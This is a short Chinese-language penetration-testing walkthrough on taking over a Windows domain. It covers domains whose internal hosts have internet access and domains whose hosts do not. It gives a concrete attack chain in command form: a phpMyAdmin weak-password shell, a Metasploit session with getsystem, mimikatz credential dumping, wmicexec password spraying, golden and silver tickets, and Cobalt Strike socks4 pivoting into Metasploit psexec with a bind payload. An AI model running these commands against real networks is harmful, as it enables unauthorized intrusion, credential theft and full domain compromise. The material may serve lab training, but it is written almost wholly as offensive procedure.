内网渗透-域内有网和无网
前言
在渗透测试的过程中,拿下域内一台主机以后,有时候内网的其他主机有网,有时候没网,此时,如果有网我们就按常规的渗透测试即可,如果没网我们就应该以该主机作为跳板,使用socks协议或其他办法,从而实现与无网的主机进行通信
域内主机有网
攻击流程
通过域环境webserver主机的外网WEB服务开启到域控权限的获取
假如已经获取webserver权限:
0x01:
- 通过phpmyadmin弱口令getshell
0x02:
- msf生成 msf监听 getsystem upload ‘/root/x64’ c:\test mimikatz
privilege::debug sekurlsa::logonpasswords
0x03:
- 批处理wmicexec测试弱口令 29 31 32 IP存在
0x04:
- 获取29 31 32权限 反弹msf getsystem
0x05
- 批处理wmicexec测试弱口令 21中标
- execute -f cmd.exe -H -i 0x06
- 导出所有hash 进行黄金白银票据
域内主机无网
Msf
- 拿下weserver,发现有两个网段,192.168.3.31 192.168.230.131
假设192.168.230.131为外网,192.168.3.31为内网 - 又发现内网其他主机都没有联网,只有webserver联网了。
- 此时,可以用webserver作为跳板,用cs开启socks,并用msf
操作流程
#cobalt strike
- 启动,监听,生成,上线,提权
- cs启动sockt4 生成监听端口跳板,将setg Proxies
- socks4:192.168.230.133:xxxxx复制到msf
msfconsole
- 加载代理:setg Proxies socks4:192.168.230.133:xxxxx
- 攻击模块:ms17010 ms14068 smb psexec等
- use exploit/windows/smb/psexec
#自己绑定自己,就实现了无网探针
- set payload bind_tcp
- set smbuser administrator
- set smbpass [email protected]#45
- 上传mimikatz:upload ‘/root/x64’ c:\test
- mimikatz privilege::debug sekurlsa::logonpasswords